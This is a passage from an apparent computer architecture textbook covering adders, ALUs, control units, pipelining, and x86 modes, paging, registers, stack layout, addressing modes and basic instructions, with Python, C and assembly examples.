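    g = [((a >> i) & 1) & ((b >> i) & 1) for i in range(width)]
    p = [((a >> i) & 1) ^ ((b >> i) & 1) for i in range(width)]
    carries = [c0]
    for i in range(width):
        # Expanded form: Ci+1 = Gi | Pi&Gi-1 | Pi&Pi-1&Gi-2 | ... | Pi&...&P0&C0
        carry, prefix = g[i], p[i]
        for j in range(i - 1, -1, -1):
            carry |= prefix & g[j]
            prefix &= p[j]
        carry |= prefix & c0
        carries.append(carry)
    return carries, p

def cla_add(a, b, width=4):
    carries, p = lookahead_carries(a, b, width)
    total = 0
    for i in range(width):
        total |= (p[i] ^ carries[i]) << i   # Si = Pi XOR Ci
    return total, carries[width]

print(cla_add(0b1011, 0b0110))
```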

Arithmetic Logic Unit (ALU)

ALU combines multiple operations with selection:

Control lines select function:
000: A AND B
001: A OR B
010: A + B
011: A - B
100: SLT (set if less than)
...

Block diagram:
A[31:0]───┐
          │
B[31:0]───┼───┐
          │   │
Control───┘   │
          ALU │
              │
Result[31:0]──┘
Flags (Zero, Carry, Overflow, Negative)
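
A behavioral model of such an ALU might look like the following. It is a sketch under stated assumptions: the control codes are the five listed above, operands are 32 bits wide, the carry flag after subtraction means "borrow" (the x86 convention; some architectures invert it), and SLT compares signed values.

```python
MASK = 0xFFFFFFFF

def to_signed(x):
    return x - (1 << 32) if x & 0x80000000 else x

def alu(control, a, b):
    """Return (result, flags) for 32-bit operands and a 3-bit control code."""
    a &= MASK
    b &= MASK
    carry = overflow = 0
    if control == 0b000:
        result = a & b
    elif control == 0b001:
        result = a | b
    elif control == 0b010:
        full = a + b
        result = full & MASK
        carry = full >> 32
        # Signed overflow: both operands differ in sign from the result.
        overflow = ((a ^ result) & (b ^ result)) >> 31
    elif control == 0b011:
        result = (a - b) & MASK
        carry = int(a < b)                     # borrow (assumed convention)
        overflow = ((a ^ b) & (a ^ result)) >> 31
    elif control == 0b100:
        result = int(to_signed(a) < to_signed(b))
    else:
        raise ValueError("control code not defined in this sketch")
    flags = {"Z": int(result == 0), "C": carry, "V": overflow, "N": result >> 31}
    return result, flags

print(alu(0b010, 0x7FFFFFFF, 1))   # largest positive value + 1 overflows
```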

3.5 Control Units

Control units generate the signals that coordinate CPU operations.

Hardwired Control

Logic gates generate control signals based on instruction:

Fast but complex for large instruction sets
Used in RISC processors
Difficult to modify

Microprogrammed Control

Control signals stored in control store (ROM):

Each instruction triggers microcode routine
Easier to modify (microcode updates)
Used in CISC processors
Slower than hardwired

Microinstruction Format:

| Next Address | Control Signals | ALU Control | ... |

Microinstructions execute in sequence to implement machine instructions:

ADD instruction microcode:
1: MAR ← PC, Read memory, PC ← PC+1
2: IR ← Memory
3: Decode IR
4: A ← Register[IR.Rs]
5: B ← Register[IR.Rt]
6: ALU ← A + B
7: Register[IR.Rd] ← ALU
8: Fetch next instruction

3.6 CPU Execution Cycle

The fundamental operation of a CPU is the fetch-decode-execute cycle.

Fetch Phase

Program Counter (PC) contains address of next instruction
Address placed on address bus
Control signals request memory read
Instruction word returned on data bus
Instruction loaded into Instruction Register (IR)
PC incremented to next instruction

Decode Phase

Instruction Register contents decoded
Control unit identifies operation and operands
Register file addresses extracted
Immediate values sign-extended
Control signals prepared for execute phase

Execute Phase

ALU performs required operation
Memory read/write performed
Register file updated
Flags updated (Zero, Carry, etc.)
PC modified for branches/jumps

Pipeline Stages

Modern CPUs pipeline this cycle:

Cycle	Stage 1	Stage 2	Stage 3	Stage 4	Stage 5
1	Fetch 1
2	Fetch 2	Decode 1
3	Fetch 3	Decode 2	Exec 1
4	Fetch 4	Decode 3	Exec 2	Mem 1
5	Fetch 5	Decode 4	Exec 3	Mem 2	Write 1
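
The staggered pattern in the table follows a simple rule: in a given cycle, stage k (counting from 0) holds instruction number cycle - k. The sketch below generates the schedule for an ideal five-stage pipeline with no hazards or stalls; the stage names follow the table and the function name is hypothetical.

```python
STAGES = ["Fetch", "Decode", "Exec", "Mem", "Write"]

def pipeline_schedule(instruction_count):
    """Return one row per cycle: the instruction number in each stage (None = empty)."""
    total_cycles = instruction_count + len(STAGES) - 1
    rows = []
    for cycle in range(1, total_cycles + 1):
        row = []
        for stage_index in range(len(STAGES)):
            instr = cycle - stage_index   # instruction occupying this stage
            row.append(instr if 1 <= instr <= instruction_count else None)
        rows.append(row)
    return rows

for cycle, row in enumerate(pipeline_schedule(3), start=1):
    cells = [f"{STAGES[i]} {n}" if n else "-" for i, n in enumerate(row)]
    print(cycle, *cells, sep="\t")
```

Under these ideal assumptions, n instructions finish in n + 4 cycles instead of the 5n cycles an unpipelined design would need.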

Pipeline Hazards

Structural hazards: Resource conflicts
Data hazards: Instruction depends on previous result
Control hazards: Branches change flow

Solutions: stalling, forwarding, branch prediction, speculation

PART II — x86 Architecture Deep Dive

Chapter 4: x86 Architecture Overview

4.1 Evolution from 8086 to x86-64

The x86 architecture's 40+ year history demonstrates remarkable backward compatibility while adding modern features.

8086 (1978)

16-bit architecture
20-bit address bus (1MB addressable)
14 registers: AX, BX, CX, DX, SI, DI, BP, SP, CS, DS, SS, ES, IP, FLAGS
Segment:offset addressing
No protection, no virtual memory
Maximum 1MB RAM

8088 (1979)

Same architecture as 8086
8-bit external data bus (cheaper implementation)
Used in original IBM PC

80286 (1982)

16-bit, 24-bit address (16MB)
Protected mode introduced
Memory protection and segment-based virtual memory, but no paging
Backward compatible with real mode

80386 (1985)

32-bit architecture
32-bit registers (EAX, EBX, etc.)
32-bit address bus (4GB)
Paging, virtual memory
Protected mode enhancements
Virtual 8086 mode
Flat memory model possible

80486 (1989)

Integrated FPU (except 486SX)
8KB L1 cache on-chip
Pipeline improvements
Faster instructions

Pentium (1993)

Superscalar (2 instructions per cycle)
64-bit data bus
MMX instructions (added with the Pentium MMX, 1997)
Better FPU

Pentium Pro (1995)

Out-of-order execution
Conditional move instructions
On-package L2 cache

Pentium II (1997)

MMX, out-of-order
Slot 1 cartridge

Pentium III (1999)

SSE (70 new instructions)
Streaming SIMD extensions

Pentium 4 (2000)

NetBurst architecture
Very deep pipeline
SSE2 (2000), SSE3 (2004)
Hyper-Threading (2002)

Core Architecture (2006)

Return to efficient pipeline
64-bit (EM64T)
Multi-core
Virtualization (VT-x)

Core i Series (2008+)

Integrated memory controller
Integrated graphics
Turbo Boost
AES-NI, AVX, AVX2
Ring bus architecture

Modern x86-64

64-bit addressing (theoretically 16EB, practically less)
16 general-purpose registers (RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, R8-R15)
RIP-relative addressing
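Segmentation mostly disabled in 64-bit mode (FS and GS bases remain)
Some legacy features unavailable in 64-bit mode (e.g., virtual 8086 mode, hardware task switching)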

4.2 Real Mode vs Protected Mode

Real Mode

16-bit mode from 8086
1MB address space (20-bit)
Segmented addressing: physical = segment×16 + offset
No protection between programs
Direct hardware access
Any program can crash the operating system
Used by bootloaders, BIOS

Real mode addressing example:

mov ax, 0x1000    ; segment
mov ds, ax
mov bx, 0x2000    ; offset
mov al, [bx]      ; accesses physical 0x1000×16 + 0x2000 = 0x12000
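
The address calculation is simple enough to model directly. In this sketch the function name and the `a20_enabled` parameter are illustrative; with the flag off, the result wraps at 1MB as it does on an 8086 with its 20 address lines.

```python
def real_mode_physical(segment, offset, a20_enabled=False):
    """physical = segment * 16 + offset, for 16-bit segment and offset values."""
    if not (0 <= segment <= 0xFFFF and 0 <= offset <= 0xFFFF):
        raise ValueError("segment and offset must be 16-bit values")
    address = (segment << 4) + offset
    # With only 20 address lines, addresses wrap around at 1MB.
    return address if a20_enabled else address & 0xFFFFF

print(hex(real_mode_physical(0x1000, 0x2000)))   # 0x12000
print(hex(real_mode_physical(0x1200, 0x0000)))   # 0x12000, a different pair for the same byte
```

The second call shows that many segment:offset pairs alias the same physical address, which matters when comparing real-mode pointers.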

Protected Mode

Introduced with 286, matured with 386
32-bit addressing (4GB)
Memory protection through segmentation and paging
Privilege levels (rings)
Virtual memory
Multitasking support
Protected from errant programs

Virtual 8086 Mode

Run real-mode programs within protected mode
Each VM86 task has 1MB virtual space
Traps sensitive instructions
Used by Windows 9x for DOS programs

4.3 Long Mode

Long mode is x86-64's 64-bit mode.

Sub-modes

64-bit mode: True 64-bit execution
Compatibility mode: Run 16/32-bit apps under 64-bit OS

Features

64-bit virtual addresses (48/57 bits actually used)
64-bit general purpose registers
8 new registers (R8-R15)
16 XMM registers (vs 8 in 32-bit)
RIP-relative addressing
No segmentation (except FS/GS for thread-local storage)
Flat memory model

Addressing Limitations

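Most current CPUs use 48-bit virtual addresses (256TB); CPUs with 5-level paging use 57 bits (128PB)
4-level paging (48 bits) or 5-level paging (57 bits)
Canonical addresses: with 48-bit addressing, bits 63:48 must be copies of bit 47 (with 57-bit addressing, bits 63:57 must be copies of bit 56)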
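
The canonical-address rule amounts to checking that the top implemented bit and every bit above it are identical. A minimal sketch, with a hypothetical function name and the address width as a parameter:

```python
def is_canonical(address, virtual_bits=48):
    """True if bits 63 down to (virtual_bits - 1) of a 64-bit address are all equal."""
    if not 0 <= address < (1 << 64):
        raise ValueError("address must be a 64-bit unsigned value")
    upper = address >> (virtual_bits - 1)             # top implemented bit and above
    all_ones = (1 << (64 - virtual_bits + 1)) - 1
    return upper == 0 or upper == all_ones

print(is_canonical(0x00007FFFFFFFFFFF))   # True: top of the lower half
print(is_canonical(0xFFFF800000000000))   # True: bottom of the upper half
print(is_canonical(0x0000800000000000))   # False with 48-bit addressing
```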

4.4 CPU Privilege Rings

x86 provides four privilege levels (0-3) called rings:

Ring 0: Kernel (most privileged)
Ring 1: Device drivers (rarely used)
Ring 2: Device drivers (rarely used)
Ring 3: Applications (least privileged)

Ring Transitions

Calls: SYSENTER/SYSEXIT, SYSCALL/SYSRET
Interrupts: Hardware interrupts, software interrupts (INT n)
Exceptions: Page faults, divide errors, etc.

What Each Ring Can Do

Ring 0 can:

Execute privileged instructions (LGDT, MOV to CR0, etc.)
Access all memory
Disable interrupts
Modify page tables

Ring 3 cannot:

Execute privileged instructions (cause #GP fault)
Access kernel memory (unless mapped with user access)
Halt the CPU

4.5 Segmentation

Segmentation divides memory into variable-sized segments.

Segment Selectors

16-bit value in segment register:

Bits 15-3: Index into descriptor table
Bit 2:     Table Indicator (0=GDT, 1=LDT)
Bits 1-0:  Requested Privilege Level (RPL)
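
Decoding a selector is a matter of shifting and masking the three fields. The sketch below uses an illustrative function name; the sample values are arbitrary and not tied to any particular operating system.

```python
def decode_selector(selector):
    """Split a 16-bit segment selector into index, table indicator, and RPL."""
    if not 0 <= selector <= 0xFFFF:
        raise ValueError("selector must be a 16-bit value")
    return {
        "index": selector >> 3,
        "table": "LDT" if selector & 0b100 else "GDT",
        "rpl": selector & 0b11,
    }

print(decode_selector(0x2B))   # index 5, GDT, RPL 3
print(decode_selector(0x08))   # index 1, GDT, RPL 0
```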

Descriptor Tables

GDT (Global Descriptor Table): Shared by all tasks
LDT (Local Descriptor Table): Per-task segments
IDT (Interrupt Descriptor Table): Interrupt handlers

Segment Descriptor (8 bytes):

Byte 0-1: Segment Limit (15:0)
Byte 2-3: Base Address (15:0)
Byte 4:   Base Address (23:16)
Byte 5:   Access Rights
    Bit 7: Present
    Bits 6-5: Privilege Level (0-3)
    Bit 4: Descriptor Type (1=code/data, 0=system)
    Bit 3: Executable (1=code, 0=data)
    For code: Bit 2: Conforming, Bit 1: Readable
    For data: Bit 2: Direction, Bit 1: Writable
    Bit 0: Accessed
Byte 6:   Flags + Limit (19:16)
    Bits 7-4: Flags (G=granularity, D/B=default size, L=long mode, AVL=available)
    Bits 3-0: Limit (19:16)
Byte 7:   Base Address (31:24)
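
Because the base and limit are scattered across the descriptor, decoding one by hand is error-prone. The sketch below assumes the standard layout for code/data descriptors: limit 15:0 in bytes 0-1, base 15:0 in bytes 2-3, base 23:16 in byte 4, the access byte in byte 5, flags plus limit 19:16 in byte 6, and base 31:24 in byte 7. The function name and dictionary keys are illustrative.

```python
def decode_descriptor(raw):
    """Decode an 8-byte code/data segment descriptor given as a 64-bit integer."""
    b = raw.to_bytes(8, "little")                  # b[0] is byte 0 in memory
    limit = b[0] | (b[1] << 8) | ((b[6] & 0x0F) << 16)
    base = b[2] | (b[3] << 8) | (b[4] << 16) | (b[7] << 24)
    access, flags = b[5], b[6] >> 4
    return {
        "base": base,
        "limit": limit,
        "present": access >> 7,
        "dpl": (access >> 5) & 0b11,
        "code_or_data": (access >> 4) & 1,
        "executable": (access >> 3) & 1,
        "granularity_4k": (flags >> 3) & 1,
        "default_32bit": (flags >> 2) & 1,
        "long_mode": (flags >> 1) & 1,
    }

# A commonly used flat 32-bit code segment: base 0, limit 0xFFFFF in 4KB units.
print(decode_descriptor(0x00CF9A000000FFFF))
```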

Address Translation

Logical address (segment:offset) → Linear address → (optional paging) → Physical

4.6 Paging & Virtual Memory

Paging provides virtual memory, protection, and isolation.

Page Tables

Modern x86 uses 4-level (or 5-level) page tables:

CR3 → PML4 → PDPT → PD → PT → 4KB Page
       9 bits 9 bits 9 bits 9 bits 12 bits offset
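
The four 9-bit indices and the 12-bit offset can be extracted from a virtual address with shifts and masks. This sketch assumes 4-level paging with 4KB pages; the function name and dictionary keys are illustrative.

```python
def split_virtual_address(va):
    """Split a virtual address into 4-level paging indices and the page offset."""
    return {
        "pml4": (va >> 39) & 0x1FF,
        "pdpt": (va >> 30) & 0x1FF,
        "pd": (va >> 21) & 0x1FF,
        "pt": (va >> 12) & 0x1FF,
        "offset": va & 0xFFF,
    }

# Build an address from known indices, then confirm they come back out.
va = (1 << 39) | (2 << 30) | (3 << 21) | (4 << 12) | 0x567
print(hex(va), split_virtual_address(va))
```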

Page Table Entry (64-bit)

Bit 0: Present
Bit 1: Read/Write
Bit 2: User/Supervisor
Bit 3: Page-level Write-Through
Bit 4: Page-level Cache Disable
Bit 5: Accessed
Bit 6: Dirty
Bit 7: Page Size (1 for 2MB/1GB pages in a PDE/PDPTE; PAT in a 4KB PTE)
Bit 8: Global
Bits 9-11: Available
Bits 12-51: Physical Address (page-aligned)
Bits 52-62: Available
Bit 63: Execute Disable (NX bit)
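
A page table entry can be decoded by testing each flag bit and masking out the physical address field. The flag names in this sketch are illustrative labels for the bits listed above; bit 7 is omitted because its meaning depends on the table level.

```python
PTE_FLAGS = {
    0: "present", 1: "writable", 2: "user", 3: "write_through",
    4: "cache_disable", 5: "accessed", 6: "dirty", 8: "global", 63: "no_execute",
}
PHYSICAL_MASK = 0x000FFFFFFFFFF000   # bits 12-51

def decode_pte(entry):
    """Return (physical page address, set of flag names) for a 64-bit entry."""
    flags = {name for bit, name in PTE_FLAGS.items() if (entry >> bit) & 1}
    return entry & PHYSICAL_MASK, flags

physical, flags = decode_pte(0x8000000012345067)
print(hex(physical), sorted(flags))
```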

Large Pages

2MB pages (PDE with PS=1)
1GB pages (PDPTE with PS=1)

TLB (Translation Lookaside Buffer)

Caches recent page translations:

Small (tens to hundreds of entries)
Very fast (accessed in parallel)
Needs invalidation on page table changes

Paging Benefits

Isolated address spaces
Demand paging (pages loaded on fault)
Shared memory (same physical page mapped multiple times)
Copy-on-write
Memory overcommitment

Chapter 5: Registers and Memory Model

5.1 General Purpose Registers

x86-64 provides 16 general-purpose registers, each 64 bits wide.

Register Names by Operand Size

64-bit | 32-bit | 16-bit | 8-bit (low) | 8-bit (high)
-------|--------|--------|-------------|------------
RAX    | EAX    | AX     | AL          | AH
RBX    | EBX    | BX     | BL          | BH
RCX    | ECX    | CX     | CL          | CH
RDX    | EDX    | DX     | DL          | DH
RSI    | ESI    | SI     | SIL         | -
RDI    | EDI    | DI     | DIL         | -
RBP    | EBP    | BP     | BPL         | -
RSP    | ESP    | SP     | SPL         | -
R8     | R8D    | R8W    | R8B         | -
R9     | R9D    | R9W    | R9B         | -
R10    | R10D   | R10W   | R10B        | -
R11    | R11D   | R11W   | R11B        | -
R12    | R12D   | R12W   | R12B        | -
R13    | R13D   | R13W   | R13B        | -
R14    | R14D   | R14W   | R14B        | -
R15    | R15D   | R15W   | R15B        | -

Register Purposes (Conventional)

RAX: Accumulator, return value, syscall number
RBX: Base register (callee-saved)
RCX: Counter (loop, shift/rotate count)
RDX: Data register (extended accumulator, I/O)
RSI: Source index (string operations)
RDI: Destination index (string operations)
RBP: Base pointer (frame pointer, callee-saved)
RSP: Stack pointer
R8-R15: General purpose (R8 and R9 carry function arguments in System V; R10, R8, R9 carry Linux syscall arguments)

5.2 Segment Registers

Segment Registers in 64-bit Mode

Most segmentation is disabled, but FS and GS remain:

CS: Code segment (not used directly)
DS: Data segment (ignored, treated as 0)
SS: Stack segment (ignored, treated as 0)
ES: Extra segment (ignored, treated as 0)
FS: Used for thread-local storage on Linux (points at the thread control block); 32-bit Windows uses it for the TEB
GS: Used for the TEB on 64-bit Windows and for per-CPU data in the Linux kernel

FS/GS Base Address

In 64-bit mode, FS and GS have hidden base addresses set via MSRs:

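; Set FS base to the 64-bit value in RDI (WRMSR is privileged: ring 0 only)
mov ecx, 0xC0000100   ; MSR_FS_BASE
mov eax, edi          ; EAX = low 32 bits of the value
mov rdx, rdi
shr rdx, 32           ; EDX = high 32 bits of the value
wrmsr                 ; write EDX:EAX to the MSR selected by ECX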

5.3 Control Registers

Control registers (CR0-CR4, CR8) control processor features.

CR0 (System Control Flags)

Bit 0: PE - Protected Mode Enable
Bit 1: MP - Monitor Coprocessor
Bit 2: EM - Emulate Coprocessor
Bit 3: TS - Task Switched
Bit 4: ET - Extension Type (80386 only)
Bit 5: NE - Numeric Error
Bit 16: WP - Write Protect (supervisor write protection)
Bit 18: AM - Alignment Mask
Bit 29: NW - Not Write-through
Bit 30: CD - Cache Disable
Bit 31: PG - Paging Enable

CR1: Reserved

CR2: Page Fault Linear Address (address that caused fault)

CR3: Page Directory Base Register (physical address of top-level page table)

CR4 (Extended Features)

Bit 0: VME - Virtual-8086 Mode Extensions
Bit 1: PVI - Protected-Mode Virtual Interrupts
Bit 2: TSD - Time Stamp Disable (RDTSC privilege)
Bit 3: DE - Debugging Extensions
Bit 4: PSE - Page Size Extensions
Bit 5: PAE - Physical Address Extensions
Bit 6: MCE - Machine Check Enable
Bit 7: PGE - Page Global Enable
Bit 8: PCE - Performance-Monitoring Counter Enable
Bit 9: OSFXSR - OS Supports FXSAVE/FXRSTOR
Bit 10: OSXMMEXCPT - OS Supports SIMD Exceptions
Bit 11: UMIP - User-Mode Instruction Prevention
Bit 12: LA57 - 57-bit Linear Addresses (5-level paging)
Bit 13: VMXE - VMX Enable
Bit 14: SMXE - SMX Enable
Bit 16: FSGSBASE - Enable RDFSBASE/WRFSBASE instructions
Bit 17: PCIDE - Process-Context Identifiers
Bit 18: OSXSAVE - OS Supports XSAVE/XRSTOR
Bit 20: SMEP - Supervisor Mode Execution Protection
Bit 21: SMAP - Supervisor Mode Access Prevention

CR8: Task Priority Register (for interrupt masking)

EFER (Extended Feature Enable Register, MSR)

Bit 0: SCE - System Call Extensions (SYSCALL/SYSRET)
Bit 8: LME - Long Mode Enable
Bit 10: LMA - Long Mode Active
Bit 11: NXE - No-Execute Enable

5.4 Debug Registers

DR0-DR7 support hardware breakpoints.

DR0-DR3: Linear breakpoint addresses

DR6: Debug status (which breakpoint triggered)

Bit 0: B0 - Breakpoint 0 condition
Bit 1: B1 - Breakpoint 1 condition
Bit 2: B2 - Breakpoint 2 condition
Bit 3: B3 - Breakpoint 3 condition
Bit 13: BD - Debug register access detected
Bit 14: BS - Single step
Bit 15: BT - Task switch

DR7: Debug control

Bits 0-1: L0,G0 - Local/Global enable for breakpoint 0
Bits 2-3: L1,G1 - Breakpoint 1
Bits 4-5: L2,G2 - Breakpoint 2
Bits 6-7: L3,G3 - Breakpoint 3
Bits 8-9: LE,GE - Exact breakpoint (deprecated)
Bit 13: GD - General Detect (fault on debug register access)
Bits 16-31: R/W0-3, LEN0-3 (type and length for each breakpoint)

Breakpoint Types (R/W field):

00: Instruction execution
01: Data writes
10: I/O reads/writes (requires CR4.DE)
11: Data reads/writes

Breakpoint Length (LEN field):

00: 1 byte
01: 2 bytes
10: 8 bytes (or reserved)
11: 4 bytes
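
The DR7 layout can be illustrated with a small C helper that builds the control value for one breakpoint. This is only a sketch of the bit arithmetic (writing DR7 itself requires ring 0); the enum and function names are hypothetical.

```c
#include <stdint.h>

enum bp_type { BP_EXEC = 0, BP_WRITE = 1, BP_IO = 2, BP_READWRITE = 3 };
enum bp_len  { BP_LEN1 = 0, BP_LEN2 = 1, BP_LEN8 = 2, BP_LEN4 = 3 };

/* Return dr7 with breakpoint n (0-3) locally enabled with the given
 * type and length. R/Wn sits at bits 16+4n, LENn at bits 18+4n. */
static uint32_t dr7_enable_local(uint32_t dr7, unsigned n,
                                 enum bp_type type, enum bp_len len)
{
    unsigned ctl_shift = 16 + n * 4;
    dr7 &= ~(0xFu << ctl_shift);                              /* clear old R/W and LEN */
    dr7 |= ((uint32_t)type | ((uint32_t)len << 2)) << ctl_shift;
    dr7 |= 1u << (n * 2);                                     /* set the Ln bit */
    return dr7;
}
```

A 4-byte write watchpoint in slot 0 gives DR7 = 0x000D0001; the watched linear address goes into DR0 separately.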

5.5 Flags Register (EFLAGS/RFLAGS)

The flags register stores status and control bits.

Status Flags (updated by arithmetic)

Bit 0: CF - Carry Flag (unsigned overflow)
Bit 2: PF - Parity Flag (even parity of low byte)
Bit 4: AF - Auxiliary Carry (BCD operations)
Bit 6: ZF - Zero Flag (result zero)
Bit 7: SF - Sign Flag (negative result)
Bit 11: OF - Overflow Flag (signed overflow)
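
As a worked illustration, the following C sketch computes the six status flags the way an 8-bit ADD would set them. It is a software model for study, not how the hardware is implemented, and the FLAG_* names and flags_after_add8 are assumptions of this example.

```c
#include <stdint.h>

#define FLAG_CF (1u << 0)
#define FLAG_PF (1u << 2)
#define FLAG_AF (1u << 4)
#define FLAG_ZF (1u << 6)
#define FLAG_SF (1u << 7)
#define FLAG_OF (1u << 11)

/* Model of the status flags after an 8-bit ADD of a and b. */
static uint32_t flags_after_add8(uint8_t a, uint8_t b, uint8_t *result)
{
    unsigned wide = (unsigned)a + (unsigned)b;
    uint8_t r = (uint8_t)wide;
    uint32_t f = 0;

    if (wide > 0xFF)                     f |= FLAG_CF; /* carry out of bit 7 */
    if ((a ^ b ^ r) & 0x10)              f |= FLAG_AF; /* carry out of bit 3 */
    if (r == 0)                          f |= FLAG_ZF;
    if (r & 0x80)                        f |= FLAG_SF;
    if ((~(a ^ b) & (a ^ r)) & 0x80)     f |= FLAG_OF; /* same-sign inputs, different-sign result */

    uint8_t p = r;                       /* fold the byte down to one parity bit */
    p ^= (uint8_t)(p >> 4);
    p ^= (uint8_t)(p >> 2);
    p ^= (uint8_t)(p >> 1);
    if ((p & 1) == 0)                    f |= FLAG_PF; /* even number of 1 bits */

    if (result) *result = r;
    return f;
}
```

Adding 0x7F and 0x01 gives 0x80 with SF, OF, and AF set: the signed result overflowed even though there was no unsigned carry.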

Control Flags

Bit 8: TF - Trap Flag (single-step for debugging)
Bit 9: IF - Interrupt Enable Flag
Bit 10: DF - Direction Flag (0=up, 1=down for string ops)
Bit 12-13: IOPL - I/O Privilege Level
Bit 14: NT - Nested Task

System Flags

Bit 16: RF - Resume Flag (debugging)
Bit 17: VM - Virtual-8086 Mode
Bit 18: AC - Alignment Check
Bit 19: VIF - Virtual Interrupt Flag
Bit 20: VIP - Virtual Interrupt Pending
Bit 21: ID - ID Flag (CPUID support)

Common Flag Operations

; Clear carry
clc

; Set carry
stc

; Complement carry
cmc

; Clear direction (string ops increment)
cld

; Set direction (string ops decrement)
std

; Clear interrupt flag
cli

; Set interrupt flag
sti

; Push flags onto stack
pushfq

; Pop flags from stack
popfq

; Load low byte of flags (SF, ZF, AF, PF, CF) into AH
lahf

; Store AH into low byte of flags
sahf

5.6 Stack Organization

The stack is a Last-In-First-Out (LIFO) data structure.

Stack Operations

; Push: decrement RSP, store value
push rax        ; RSP -= 8, [RSP] = RAX

; Pop: load value, increment RSP
pop rax         ; RAX = [RSP], RSP += 8

; Call: push return address, jump
call func       ; push RIP (next instruction), jmp func

; Return: pop return address, jump
ret             ; pop RIP, jmp

Stack Frame Layout

Typical function prologue:

push rbp        ; save caller's frame pointer
mov rbp, rsp    ; set our frame pointer
sub rsp, 32     ; allocate local variables

Stack layout:

High addresses
+-----------------+
| Caller's frame  |
+-----------------+ <--- RBP+16 (first stack argument)
| Return address  |
+-----------------+ <--- RBP+8
| Saved RBP       |
+-----------------+ <--- RBP
| Local variables |
+-----------------+ <--- RBP-x
| (alignment)     |
+-----------------+ <--- RSP
Low addresses

Stack Alignment

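The x86-64 ABIs (System V and Microsoft) require 16-byte stack alignment at the point of a call:

RSP must be a multiple of 16 immediately before CALL
CALL pushes an 8-byte return address, so RSP is misaligned by 8 on function entry
The function prologue re-aligns (push rbp, then a sub rsp that keeps the total a multiple of 16)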
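
The alignment arithmetic can be sketched in C. The helper below assumes the function was entered through CALL with the caller's RSP 16-byte aligned; align_down16 and frame_size are names chosen for this example.

```c
#include <stdint.h>

/* Round a stack pointer value down to a 16-byte boundary (the stack grows down). */
static uint64_t align_down16(uint64_t rsp)
{
    return rsp & ~(uint64_t)15;
}

/* Amount to subtract from RSP in the prologue so that `locals` bytes fit
 * and RSP is 16-byte aligned again before the next CALL.
 * `pushes` is the number of 8-byte pushes the prologue performs. */
static uint64_t frame_size(uint64_t locals, unsigned pushes)
{
    uint64_t used  = 8 + 8ull * pushes;              /* return address + pushes */
    uint64_t total = (used + locals + 15) & ~(uint64_t)15;
    return total - used;
}
```

With one push (push rbp) and 32 bytes of locals the answer is 32; with no pushes it is 40, because the extra 8 bytes compensate for the return address.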

5.7 Memory Addressing Modes

x86 provides flexible addressing modes.

Immediate (constant in instruction)

mov rax, 42      ; 42 is immediate

Register (value in register)

mov rax, rbx     ; content of RBX

Direct (address constant)

mov rax, [0x1234]    ; load from absolute address

Register Indirect

mov rax, [rbx]       ; address in RBX

Base + Displacement

mov rax, [rbx + 16]   ; RBX + 16
mov rax, [array + 8]  ; constant + 8

Indexed

mov rax, [rbx + rcx*8]   ; RBX + RCX*8

Base + Index + Displacement

mov rax, [rbx + rcx*4 + 16]   ; most complex form

RIP-Relative (64-bit only)

mov rax, [rel var]        ; NASM syntax; displacement is relative to the address of the next instruction

Addressing Mode Encodings

MODRM byte structure:

7 6 5 4 3 2 1 0
+-----+-----+-----+
| Mod | Reg | R/M |
+-----+-----+-----+

SIB byte (Scale-Index-Base):

7 6 5 4 3 2 1 0
+-----+-----+-----+
|Scale|Index|Base |
+-----+-----+-----+
Scale: 00=1, 01=2, 10=4, 11=8
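
The two byte layouts can be decoded with a few shifts and masks. The C sketch below uses illustrative type and function names and ignores REX extension bits, which add a fourth bit to the reg, index, and base fields.

```c
#include <stdint.h>

typedef struct { unsigned mod, reg, rm; } modrm_fields;
typedef struct { unsigned scale, index, base; } sib_fields;

/* Split a ModRM byte into Mod (bits 7-6), Reg (5-3), and R/M (2-0). */
static modrm_fields decode_modrm(uint8_t b)
{
    modrm_fields f;
    f.mod = (unsigned)(b >> 6);
    f.reg = (unsigned)((b >> 3) & 7);
    f.rm  = (unsigned)(b & 7);
    return f;
}

/* Split a SIB byte; scale is returned as the multiplier 1, 2, 4, or 8. */
static sib_fields decode_sib(uint8_t b)
{
    sib_fields f;
    f.scale = 1u << (b >> 6);
    f.index = (unsigned)((b >> 3) & 7);
    f.base  = (unsigned)(b & 7);
    return f;
}
```

For mov rax, [rbx + rcx*8], encoded as 48 8B 04 CB, the ModRM byte 0x04 has R/M=100 (a SIB byte follows) and the SIB byte 0xCB decodes to scale 8, index 1 (RCX), base 3 (RBX).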

Chapter 6: Instruction Set Architecture (ISA)

6.1 Data Movement Instructions

MOV (Move)

Most common instruction, copies data between registers/memory.

mov rax, rbx          ; register to register
mov rax, [mem]        ; memory to register
mov [mem], rax        ; register to memory
mov rax, 1234         ; immediate to register
mov dword [mem], 1234 ; immediate to memory (size specifier required)

Size specifiers (NASM):

mov byte [mem], 12    ; 8-bit
mov word [mem], 1234  ; 16-bit
mov dword [mem], 1234 ; 32-bit
mov qword [mem], 1234 ; 64-bit

MOVZX (Move with Zero-Extend)

movzx eax, bl         ; zero-extend BL to EAX
movzx rax, bx         ; zero-extend BX to RAX

MOVSX (Move with Sign-Extend)

movsx eax, bl         ; sign-extend BL to EAX
movsx rax, bx         ; sign-extend BX to RAX
movsxd rax, ebx       ; sign-extend 32-bit to 64-bit (special)

XCHG (Exchange)

xchg rax, rbx         ; swap RAX and RBX
xchg [mem], rax       ; atomic exchange with memory

PUSH/POP (Stack operations)

push rax              ; push RAX onto stack
push 1234             ; push immediate
push word 1234        ; push 16-bit immediate
pop rax               ; pop into RAX
pop qword [mem]       ; pop into memory (size specifier required)

LEA (Load Effective Address)

Computes address but doesn't access memory.

lea rax, [rbx+rcx*4]  ; RAX = RBX + RCX*4
lea rax, [rel array]  ; RAX = address of array (RIP-relative)

Common trick: LEA for arithmetic:

lea eax, [ebx+ecx]    ; EAX = EBX + ECX (without setting flags)
lea eax, [ebx*4+ebx]  ; EAX = EBX*5

CMOV (Conditional Move)

cmp eax, ebx
cmovg ecx, edx        ; if EAX > EBX, ECX = EDX

MOVBE (Move with Byte Swap)

movbe eax, [mem]      ; load with byte swap (little-endian to big-endian)

6.2 Arithmetic Instructions

Addition

add rax, rbx          ; RAX = RAX + RBX
add rax, 1234         ; RAX = RAX + 1234
add [mem], rax        ; memory += RAX

adc rax, rbx          ; add with carry (for multi-precision)

Subtraction

sub rax, rbx          ; RAX = RAX - RBX
sub rax, 1234         ; RAX = RAX - 1234

sbb rax, rbx          ; subtract with borrow

Multiplication

mul rbx               ; unsigned: RDX:RAX = RAX * RBX
imul rbx              ; signed: RDX:RAX = RAX * RBX

imul rax, rbx         ; RAX = RAX * RBX
imul rax, rbx, 1234   ; RAX = RBX * 1234

Division

